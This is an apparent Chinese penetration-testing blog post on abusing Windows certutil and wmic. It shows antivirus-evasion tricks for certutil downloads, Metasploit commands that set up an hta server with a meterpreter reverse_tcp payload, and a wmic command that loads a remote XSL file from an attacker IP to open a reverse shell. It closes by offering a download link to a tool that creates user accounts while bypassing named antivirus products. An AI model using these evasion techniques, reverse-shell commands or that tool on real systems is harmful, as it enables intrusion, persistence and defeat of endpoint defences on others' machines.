【A9】certutil,wmic命令执行敏感操作

文摘   科技   2023-10-30 09:15   广东  

“A9 Team 甲方攻防团队,成员来自某证券、微步、青藤、长亭、安全狗等公司。成员能力涉及安全运营、威胁情报、攻防对抗、渗透测试、数据安全、安全产品开发等领域,持续分享安全运营和攻防的思考和实践。”



01

Certutil介绍


Certutil.exe 是作为证书服务的一部分安装的命令行工具。 可以使用 certutil.exe 显示证书颁发机构 (CA) 配置信息、配置证书服务、备份和还原 CA 组件。 该计划还验证证书、密钥对和证书链。

操作介绍

Certutil 作为windows 的正常服务,却被滥用进行恶意操作。Certutil 命令中有个参数urlcache 可以用于远程下载,直接运行指令会windows defender和大部分杀软查杀,如图

这个时候可以利用windows 的特性,无视 ; “ ^ @ 等字符,通过组合方式绕过,如图:



可以正常运行下载,不被windows defender查杀,接下来尝试测试绕过杀软的检测。安装环境后测试,发现直接输入和代码混淆都会被检测到。




此时我们可以尝试用windows 的另一个指令来进行绕过,通过copy命令将certuil 程序复制并用不同名字来命名,然后再执行指令后,杀软无法进行检测。



但是以上的各种方式在另一款杀软均被检测识别,无法执行成功



这时候可以通过certutil 指令的可选参数 DeleteHelloContainer ,将文件下载为缓存文件,在将缓存文件恢复回原文件,且不会被杀软检测到。




02

利用Wmic 进行无文件攻击

wmic.exe是WMI 命令行。作为 Windows XP 的一部分发布的 WMI 命令行工具 (wmic.exe) 提供一个到 WMI 基础结构的命令行接口。wmic可以远程执行任何文件或脚本,因此我们将在XSL代码中链接一个hta文件。XSL文件将包含一个链接,用于通过mshta.exe下载并执行恶意hta文件,该文件由wmic触发


03

操作介绍

攻击机kali生成hta文件,并开启监听。


use exploit\windows\misc\hta-serverset payload windows\meterpreter\reverse_tcprun


个人主机新建test.xsl 文件,并将hta文件路径写入



靶机使用wimic 命令远程加载test.xsl文件

Wmic process get brief /format:”http://xx.xxx.x.xxx:8900/test.xsl”



攻击机成功反弹sessions



主机A 调用Wmic.exe 向主机B发送http请求加载远程xsl文件,并将文件保存为对象加载到内存中,内存按照xsl文件定义的规则进行转换,xsl 请求mshta 远程执行攻击机生成的恶意hta文件,这个文件是攻击机通过msf起的hta服务器,并搭配反弹shell的payload生成的。



接下来给大家分享个工具,python写的通过调用windwos api创建用户,可绕其XX,火X等杀软。



工具链接:https://cowtransfer.com/s/908c2f3bcb3542 点击链接查看 [ creat_user.exe ] ,或访问奶牛快传 cowtransfer.com 输入传输口令 q8rte4 查看;








A9 Team
A9 Team 甲方攻防团队,成员来自某证券、微步、青藤、长亭、安全狗等公司。成员能力涉及安全运营、威胁情报、攻防对抗、渗透测试、数据安全、安全产品开发等领域,持续分享安全运营和攻防的思考和实践,期望和朋友们共同进步,守望相助,合作共赢。
 最新文章